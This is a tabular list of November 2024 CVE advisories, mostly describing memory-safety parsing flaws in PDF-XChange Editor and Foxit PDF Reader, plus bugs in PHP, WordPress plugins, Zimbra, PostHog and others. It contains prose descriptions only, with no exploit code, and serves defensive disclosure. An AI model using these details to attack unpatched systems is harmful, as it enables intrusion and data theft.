PDF-XChange Editor U3D File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24214. | 2024-11-22 | not yet calculated | CVE-2024-8819 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24215. | 2024-11-22 | not yet calculated | CVE-2024-8820 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24216. | 2024-11-22 | not yet calculated | CVE-2024-8821 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24217. | 2024-11-22 | not yet calculated | CVE-2024-8822 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24261. | 2024-11-22 | not yet calculated | CVE-2024-8823 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24262. | 2024-11-22 | not yet calculated | CVE-2024-8824 |
| n/a -- n/a |
PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24263. | 2024-11-22 | not yet calculated | CVE-2024-8825 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24305. | 2024-11-22 | not yet calculated | CVE-2024-8826 |
| n/a -- n/a |
PDF-XChange Editor PPM File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PPM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24306. | 2024-11-22 | not yet calculated | CVE-2024-8827 |
| n/a -- n/a |
PDF-XChange Editor EMF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24313. | 2024-11-22 | not yet calculated | CVE-2024-8828 |
| n/a -- n/a |
PDF-XChange Editor EMF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24314. | 2024-11-22 | not yet calculated | CVE-2024-8829 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24315. | 2024-11-22 | not yet calculated | CVE-2024-8830 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24316. | 2024-11-22 | not yet calculated | CVE-2024-8831 |
| n/a -- n/a |
PDF-XChange Editor EMF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24317. | 2024-11-22 | not yet calculated | CVE-2024-8832 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24318. | 2024-11-22 | not yet calculated | CVE-2024-8833 |
| n/a -- n/a |
PDF-XChange Editor TIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24319. | 2024-11-22 | not yet calculated | CVE-2024-8834 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24320. | 2024-11-22 | not yet calculated | CVE-2024-8835 |
| n/a -- n/a |
PDF-XChange Editor TIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24354. | 2024-11-22 | not yet calculated | CVE-2024-8836 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24408. | 2024-11-22 | not yet calculated | CVE-2024-8837 |
| n/a -- n/a |
PDF-XChange Editor XPS File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24409. | 2024-11-22 | not yet calculated | CVE-2024-8838 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24419. | 2024-11-22 | not yet calculated | CVE-2024-8839 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. . Was ZDI-CAN-24420. | 2024-11-22 | not yet calculated | CVE-2024-8840 |
| n/a -- n/a |
PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24432. | 2024-11-22 | not yet calculated | CVE-2024-8841 |
| n/a -- n/a |
PDF-XChange Editor RTF File Parsing Uninitialized Variable Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RTF files. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24481. | 2024-11-22 | not yet calculated | CVE-2024-8842 |
| n/a -- n/a |
PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24495. | 2024-11-22 | not yet calculated | CVE-2024-8843 |
| n/a -- n/a |
PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24550. | 2024-11-22 | not yet calculated | CVE-2024-8844 |
| n/a -- n/a |
PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24553. | 2024-11-22 | not yet calculated | CVE-2024-8845 |
| n/a -- n/a |
PDF-XChange Editor TIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24835. | 2024-11-22 | not yet calculated | CVE-2024-8846 |
| n/a -- n/a |
PDF-XChange Editor Doc Object Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25198. | 2024-11-22 | not yet calculated | CVE-2024-8847 |
| n/a -- n/a |
PDF-XChange Editor AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-25268. | 2024-11-22 | not yet calculated | CVE-2024-8848 |
| n/a -- n/a |
PDF-XChange Editor AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-25269. | 2024-11-22 | not yet calculated | CVE-2024-8849 |
| n/a -- n/a |
In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, a hostile MySQL server can cause the client to disclose the content of its heap containing data from other SQL requests and possible other data belonging to different users of the same server. | 2024-11-22 | not yet calculated | CVE-2024-8929 |
| n/a -- n/a |
In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, uncontrolled long string inputs to ldap_escape() function on 32-bit systems can cause an integer overflow, resulting in an out-of-bounds write. | 2024-11-22 | not yet calculated | CVE-2024-8932 |
| n/a -- n/a |
FastStone Image Viewer PSD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FastStone Image Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25102. | 2024-11-22 | not yet calculated | CVE-2024-9112 |
| n/a -- n/a |
FastStone Image Viewer TGA File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FastStone Image Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TGA files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25140. | 2024-11-22 | not yet calculated | CVE-2024-9113 |
| n/a -- n/a |
FastStone Image Viewer GIF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FastStone Image Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of GIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25145. | 2024-11-22 | not yet calculated | CVE-2024-9114 |
| n/a -- n/a |
Foxit PDF Reader AcroForm Doc Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23932. | 2024-11-22 | not yet calculated | CVE-2024-9243 |
| n/a -- n/a |
Foxit PDF Reader Update Service Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PDF Reader. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit Reader Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-23933. | 2024-11-22 | not yet calculated | CVE-2024-9244 |
| n/a -- n/a |
Foxit PDF Reader Update Service Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PDF Reader. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit Reader Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-23966. | 2024-11-22 | not yet calculated | CVE-2024-9245 |
| n/a -- n/a |
Foxit PDF Reader Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24135. | 2024-11-22 | not yet calculated | CVE-2024-9246 |
| n/a -- n/a |
Foxit PDF Reader Annotation Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a write before the start of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24173. | 2024-11-22 | not yet calculated | CVE-2024-9247 |
| n/a -- n/a |
Foxit PDF Reader PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24300. | 2024-11-22 | not yet calculated | CVE-2024-9248 |
| n/a -- n/a |
Foxit PDF Reader PDF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24301. | 2024-11-22 | not yet calculated | CVE-2024-9249 |
| n/a -- n/a |
Foxit PDF Reader AcroForm Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24489. | 2024-11-22 | not yet calculated | CVE-2024-9250 |
| n/a -- n/a |
Foxit PDF Reader Annotation Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24490. | 2024-11-22 | not yet calculated | CVE-2024-9251 |
| n/a -- n/a |
Foxit PDF Reader AcroForm Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24491. | 2024-11-22 | not yet calculated | CVE-2024-9252 |
| n/a -- n/a |
Foxit PDF Reader AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24492. | 2024-11-22 | not yet calculated | CVE-2024-9253 |
| n/a -- n/a |
Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25173. | 2024-11-22 | not yet calculated | CVE-2024-9254 |
| n/a -- n/a |
Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25174. | 2024-11-22 | not yet calculated | CVE-2024-9255 |
| n/a -- n/a |
Foxit PDF Reader AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-25267. | 2024-11-22 | not yet calculated | CVE-2024-9256 |
| n/a -- n/a |
Logsign Unified SecOps Platform delete_gsuite_key_file Input Validation Arbitrary File Deletion Vulnerability. This vulnerability allows remote attackers to delete arbitrary files within sensitive directories on affected installations of Logsign Unified SecOps Platform. Authentication is required to exploit this vulnerability. The specific flaw exists within the delete_gsuite_key_file endpoint. The issue results from the lack of proper validation of a user-supplied filename prior to using it in file operations. An attacker can leverage this vulnerability to delete critical files on the system. Was ZDI-CAN-25265. | 2024-11-22 | not yet calculated | CVE-2024-9257 |
| n/a -- n/a |
The GEO my WP WordPress plugin before 4.5, gmw-premium-settings WordPress plugin before 3.1 does not sufficiently validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server. | 2024-11-22 | not yet calculated | CVE-2024-9422 |
| n/a -- n/a |
Improper Privilege Management vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Privilege Escalation.This issue affects upKeeper Instant Privilege Access: before 1.2. | 2024-11-20 | not yet calculated | CVE-2024-9478 |
| n/a -- n/a |
Improper Privilege Management vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Privilege Escalation.This issue affects upKeeper Instant Privilege Access: before 1.2. | 2024-11-20 | not yet calculated | CVE-2024-9479 |
| n/a -- n/a |
The FluentSMTP - WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.2.82 via deserialization of untrusted input in the 'formatResult' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. The vulnerability was partially patched in version 2.2.82. | 2024-11-23 | not yet calculated | CVE-2024-9511 |
| n/a -- n/a |
There exists a stored XSS Vulnerability in Kubeflow Pipeline View web UI. The Kubeflow Web UI allows to create new pipelines. When creating a new pipeline, it is possible to add a description. The description field allows html tags, which are not filtered properly. Leading to a stored XSS. We recommend upgrading past commit 930c35f1c543998e60e8d648ce93185c9b5dbe8d | 2024-11-18 | not yet calculated | CVE-2024-9526 |
| n/a -- n/a |
The Ditty WordPress plugin before 3.1.47 does not sanitise and escape some of its settings, which could allow high privilege users such as author to perform Stored Cross-Site Scripting attacks. | 2024-11-21 | not yet calculated | CVE-2024-9600 |
| n/a -- n/a |
The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_user_avatar_image_upload() function in all versions up to, and including, 91.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-11-23 | not yet calculated | CVE-2024-9659 |
| n/a -- n/a |
Zimbra GraphQL Cross-Site Request Forgery Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Zimbra. User interaction is required to exploit this vulnerability in that the target must open a malicious email message. The specific flaw exists within the implementation of the graphql endpoint. The issue results from the lack of proper protections against cross-site request forgery (CSRF) attacks. An attacker can leverage this vulnerability to disclose information in the context of the target email account. Was ZDI-CAN-23939. | 2024-11-22 | not yet calculated | CVE-2024-9665 |
| n/a -- n/a |
PostHog database_schema Server-Side Request Forgery Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PostHog. Authentication is required to exploit this vulnerability. The specific flaw exists within the implementation of the database_schema method. The issue results from the lack of proper validation of a URI prior to accessing resources. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-25351. | 2024-11-22 | not yet calculated | CVE-2024-9710 |
| n/a -- n/a |
Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23530. | 2024-11-22 | not yet calculated | CVE-2024-9712 |
| n/a -- n/a |
